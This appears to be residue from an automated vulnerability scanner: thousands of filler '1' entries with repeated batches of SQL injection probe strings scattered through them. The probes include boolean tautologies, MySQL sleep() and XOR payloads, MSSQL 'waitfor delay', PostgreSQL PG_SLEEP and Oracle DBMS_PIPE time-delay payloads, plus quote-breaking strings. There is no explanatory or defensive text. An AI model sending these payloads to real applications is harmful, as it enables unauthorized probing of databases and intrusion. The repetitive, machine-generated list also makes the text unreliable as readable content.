-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
6TvxNAxB
-
-1 OR 2+937-937-1=0+0+0+1 --
-
1
-
-1 OR 2+153-153-1=0+0+0+1
-
-1' OR 2+407-407-1=0+0+0+1 --
-
-1' OR 2+891-891-1=0+0+0+1 or 'D1wl71py'='
-
1
-
-1" OR 2+773-773-1=0+0+0+1 --
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
if(now()=sysdate(),sleep(15),0)
-
1
-
1
-
1
-
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
-
1
-
1
-
1
-
1
-
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
-1; waitfor delay '0:0:15' --
-
1
-
1
-
1
-
1
-
1
-
1
-
-1); waitfor delay '0:0:15' --
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
-1)); waitfor delay '0:0:15' --
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1 waitfor delay '0:0:15' --
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
0FbB9a1S'; waitfor delay '0:0:15' --
-
1
-
1
-
1
-
1
-
QxBbl0ha'); waitfor delay '0:0:15' --
-
1
-
1
-
1
-
1
-
1
-
1
-
XHQFmfty')); waitfor delay '0:0:15' --
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
-5 OR 235=(SELECT 235 FROM PG_SLEEP(15))--
-
1
-
1
-
1
-
1
-
-5) OR 352=(SELECT 352 FROM PG_SLEEP(15))--
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
-1)) OR 975=(SELECT 975 FROM PG_SLEEP(15))--
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
RzITMOX3' OR 598=(SELECT 598 FROM PG_SLEEP(15))--
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
ZAjRIiNU') OR 101=(SELECT 101 FROM PG_SLEEP(15))--
-
1
-
1
-
1
-
1
-
1CsKRWVX')) OR 896=(SELECT 896 FROM PG_SLEEP(15))--
-
1
-
1
-
1
-
1
-
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
-
1'"
-
1
-
1 ????%2527%2522
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
JEBEFiSG
-
-1 OR 2+263-263-1=0+0+0+1 --
-
1
-
-1 OR 2+490-490-1=0+0+0+1
-
1
-
-1' OR 2+988-988-1=0+0+0+1 --
-
-1' OR 2+626-626-1=0+0+0+1 or 'PnrA1OA1'='
-
-1" OR 2+139-139-1=0+0+0+1 --
-
1
-
1
-
1
-
1
-
if(now()=sysdate(),sleep(15),0)
-
1
-
1
-
1
-
1
-
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
-
1
-
1
-
1
-
1
-
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
-
1
-
1
-
1
-
1
-
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
-
1
-
1
-
1
-
1
-
-1; waitfor delay '0:0:15' --
-
1
-
1
-
1
-
1
-
-1); waitfor delay '0:0:15' --
-
1
-
1
-
1
-
1
-
-1)); waitfor delay '0:0:15' --
-
1
-
1
-
1
-
1
-
1 waitfor delay '0:0:15' --
-
1
-
1
-
1
-
1
-
Thp6l40l'; waitfor delay '0:0:15' --
-
1
-
1
-
1
-
1
-
mEw6Iiyq'); waitfor delay '0:0:15' --
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
kdsg4Sz7')); waitfor delay '0:0:15' --
-
1
-
1
-
1
-
1
-
-5 OR 306=(SELECT 306 FROM PG_SLEEP(15))--
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
-5) OR 659=(SELECT 659 FROM PG_SLEEP(15))--
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
-1)) OR 846=(SELECT 846 FROM PG_SLEEP(15))--
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
90nqVq84' OR 764=(SELECT 764 FROM PG_SLEEP(15))--
-
1
-
1
-
1
-
1
-
V14er4Xa') OR 425=(SELECT 425 FROM PG_SLEEP(15))--
-
1
-
1
-
1
-
i4oT62Uh')) OR 740=(SELECT 740 FROM PG_SLEEP(15))--
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
-
1
-
1
-
1
-
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
-
1'"
-
1 ????%2527%2522
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
9ovtisWX
-
-1 OR 2+222-222-1=0+0+0+1 --
-
-1 OR 2+907-907-1=0+0+0+1
-
-1' OR 2+437-437-1=0+0+0+1 --
-
-1' OR 2+320-320-1=0+0+0+1 or 'qcDil38T'='
-
-1" OR 2+570-570-1=0+0+0+1 --
-
1
-
1
-
1
-
1
-
if(now()=sysdate(),sleep(15),0)
-
1
-
1
-
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
-
1
-
1
-
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
-
1
-
1
-
1
-
1
-
-1; waitfor delay '0:0:15' --
-
1
-
1
-
1
-
1
-
1
-
-1); waitfor delay '0:0:15' --
-
1
-
1
-
-1)); waitfor delay '0:0:15' --
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1 waitfor delay '0:0:15' --
-
1
-
1
-
iFlYS8LG'; waitfor delay '0:0:15' --
-
1
-
1
-
tNflW9IS'); waitfor delay '0:0:15' --
-
1
-
1
-
hVcedA6M')); waitfor delay '0:0:15' --
-
1
-
1
-
-5 OR 395=(SELECT 395 FROM PG_SLEEP(15))--
-
1
-
1
-
-5) OR 93=(SELECT 93 FROM PG_SLEEP(15))--
-
1
-
1
-
-1)) OR 43=(SELECT 43 FROM PG_SLEEP(15))--
-
1
-
1
-
1
-
1
-
1
-
yZ0I372q' OR 169=(SELECT 169 FROM PG_SLEEP(15))--
-
1
-
1
-
1
-
zFoV2lM5') OR 238=(SELECT 238 FROM PG_SLEEP(15))--
-
1
-
1
-
vfpDAGM2')) OR 265=(SELECT 265 FROM PG_SLEEP(15))--
-
1
-
1
-
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
-
1
-
m52KnO8s
-
-1 OR 2+244-244-1=0+0+0+1 --
-
-1 OR 2+242-242-1=0+0+0+1
-
-1' OR 2+576-576-1=0+0+0+1 --
-
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
-
-1' OR 2+330-330-1=0+0+0+1 or '62R1dKl1'='
-
1'"
-
-1" OR 2+359-359-1=0+0+0+1 --
-
1 ????%2527%2522
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
if(now()=sysdate(),sleep(15),0)
-
1
-
1
-
1
-
1
-
1
-
if(now()=sysdate(),sleep(15),0)
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
if(now()=sysdate(),sleep(6),0)
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
-
1
-
1
-
lSGAgAcB
-
1
-
-1 OR 2+517-517-1=0+0+0+1 --
-
1
-
-1 OR 2+116-116-1=0+0+0+1
-
1
-
1
-
-1' OR 2+817-817-1=0+0+0+1 --
-
-1' OR 2+321-321-1=0+0+0+1 or 'l60EwgP4'='
-
-1" OR 2+404-404-1=0+0+0+1 --
-
1
-
1
-
1
-
1
-
1
-
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
-
1
-
if(now()=sysdate(),sleep(15),0)
-
1
-
1
-
1
-
1
-
1
-
1
-
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
-
1
-
1
-
1
-
1
-
1
-
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
-
-1; waitfor delay '0:0:15' --
-
1
-
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
-
-1); waitfor delay '0:0:15' --
-
1
-
1
-
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
-
-1)); waitfor delay '0:0:15' --
-
1
-
-1; waitfor delay '0:0:15' --
-
1
-
1 waitfor delay '0:0:15' --
-
1
-
-1); waitfor delay '0:0:15' --
-
yJ7egpb3'; waitfor delay '0:0:15' --
-
1
-
-1)); waitfor delay '0:0:15' --
-
1
-
1
-
1
-
1
-
1
-
1
-
PtXdRQlA'); waitfor delay '0:0:15' --
-
1
-
1 waitfor delay '0:0:15' --
-
GsnjtLit')); waitfor delay '0:0:15' --
-
1
-
yKnwxFAt'; waitfor delay '0:0:15' --
-
1
-
-5 OR 838=(SELECT 838 FROM PG_SLEEP(15))--
-
1
-
I3vUCVcm'); waitfor delay '0:0:15' --
-
1
-
-5) OR 928=(SELECT 928 FROM PG_SLEEP(15))--
-
1
-
wS7T7TwD')); waitfor delay '0:0:15' --
-
1
-
-5) OR 887=(SELECT 887 FROM PG_SLEEP(15))--
-
1
-
1
-
-5 OR 37=(SELECT 37 FROM PG_SLEEP(15))--
-
1
-
-5) OR 85=(SELECT 85 FROM PG_SLEEP(3))--
-
1
-
-5) OR 709=(SELECT 709 FROM PG_SLEEP(15))--
-
1
-
-1)) OR 862=(SELECT 862 FROM PG_SLEEP(15))--
-
1
-
-1)) OR 201=(SELECT 201 FROM PG_SLEEP(15))--
-
1
-
rZgU01pz' OR 810=(SELECT 810 FROM PG_SLEEP(15))--
-
1
-
1
-
1
-
1
-
QgR0ZWeN' OR 540=(SELECT 540 FROM PG_SLEEP(15))--
-
1
-
1
-
MtZhDgfw') OR 850=(SELECT 850 FROM PG_SLEEP(15))--
-
1
-
3nBKvtzf') OR 494=(SELECT 494 FROM PG_SLEEP(15))--
-
1
-
1
-
1
-
O7uKcpbR')) OR 987=(SELECT 987 FROM PG_SLEEP(15))--
-
l5WEuKag')) OR 537=(SELECT 537 FROM PG_SLEEP(15))--
-
1
-
1
-
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
-
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
-
1
-
1
-
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
-
1
-
1'"
-
1
-
1 ????%2527%2522
-
1
-
1
-
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
-
1
-
1'"
-
1
-
1 ????%2527%2522
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
qkj7b5YG
-
-1 OR 2+448-448-1=0+0+0+1 --
-
-1 OR 2+441-441-1=0+0+0+1
-
-1' OR 2+566-566-1=0+0+0+1 --
-
-1' OR 2+434-434-1=0+0+0+1 or 'fUufnNqV'='
-
-1" OR 2+480-480-1=0+0+0+1 --
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
if(now()=sysdate(),sleep(15),0)
-
1
-
1
-
1
-
1
-
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
-
1
-
1
-
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
-
1
-
1
-
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
-
1
-
1
-
1
-
1
-
-1; waitfor delay '0:0:15' --
-
1
-
1
-
1
-
1
-
-1); waitfor delay '0:0:15' --
-
1
-
1
-
-1)); waitfor delay '0:0:15' --
-
1
-
1
-
1
-
1 waitfor delay '0:0:15' --
-
1
-
1
-
1
-
3uZXOQ1c'; waitfor delay '0:0:15' --
-
1
-
1
-
LjZaqcid'); waitfor delay '0:0:15' --
-
1
-
1
-
KMGGtW1e')); waitfor delay '0:0:15' --
-
1
-
1
-
1
-
1
-
1
-
-5 OR 31=(SELECT 31 FROM PG_SLEEP(15))--
-
1
-
1
-
-5) OR 265=(SELECT 265 FROM PG_SLEEP(15))--
-
1
-
1
-
-1)) OR 145=(SELECT 145 FROM PG_SLEEP(15))--
-
1
-
1
-
1
-
1
-
1
-
YuKzVwhs' OR 450=(SELECT 450 FROM PG_SLEEP(15))--
-
1
-
1
-
1
-
1
-
01jwWS4m') OR 505=(SELECT 505 FROM PG_SLEEP(15))--
-
1
-
1
-
vFbkbbLa')) OR 359=(SELECT 359 FROM PG_SLEEP(15))--
-
1
-
1
-
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
-
1
-
1
-
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
-
1 ????%2527%2522
-
1'"
-
1'"
-
1'"
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
9uZgL72L
-
-1 OR 2+16-16-1=0+0+0+1 --
-
-1 OR 2+651-651-1=0+0+0+1
-
-1' OR 2+562-562-1=0+0+0+1 --
-
-1' OR 2+357-357-1=0+0+0+1 or 'CjnWg7yN'='
-
-1" OR 2+819-819-1=0+0+0+1 --
-
1'"
-
1 ????%2527%2522
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
tRDWeoRU
-
-1 OR 2+559-559-1=0+0+0+1 --
-
-1 OR 2+766-766-1=0+0+0+1
-
-1' OR 2+290-290-1=0+0+0+1 --
-
-1' OR 2+593-593-1=0+0+0+1 or 'KR4mynl9'='
-
-1" OR 2+270-270-1=0+0+0+1 --
-
1
-
if(now()=sysdate(),sleep(15),0)
-
1
-
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
-
1
-
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
-
1
-
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
-
1
-
-1; waitfor delay '0:0:15' --
-
1
-
1
-
-1); waitfor delay '0:0:15' --
-
1
-
-1)); waitfor delay '0:0:15' --
-
1
-
1 waitfor delay '0:0:15' --
-
1
-
sQXd4oue'; waitfor delay '0:0:15' --
-
1
-
1
-
1
-
1
-
1
-
1
-
GyO2Q9Xw'); waitfor delay '0:0:15' --
-
1
-
FJ6iiuP3')); waitfor delay '0:0:15' --
-
1
-
-5 OR 45=(SELECT 45 FROM PG_SLEEP(15))--
-
1
-
-5) OR 63=(SELECT 63 FROM PG_SLEEP(15))--
-
1
-
-1)) OR 502=(SELECT 502 FROM PG_SLEEP(15))--
-
1
-
lmALRtMk' OR 890=(SELECT 890 FROM PG_SLEEP(15))--
-
1
-
Mys0hZQK') OR 484=(SELECT 484 FROM PG_SLEEP(15))--
-
1
-
099tC9dz')) OR 233=(SELECT 233 FROM PG_SLEEP(15))--
-
1
-
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
-
1
-
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
-
1'"
-
1 ????%2527%2522
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1
-
1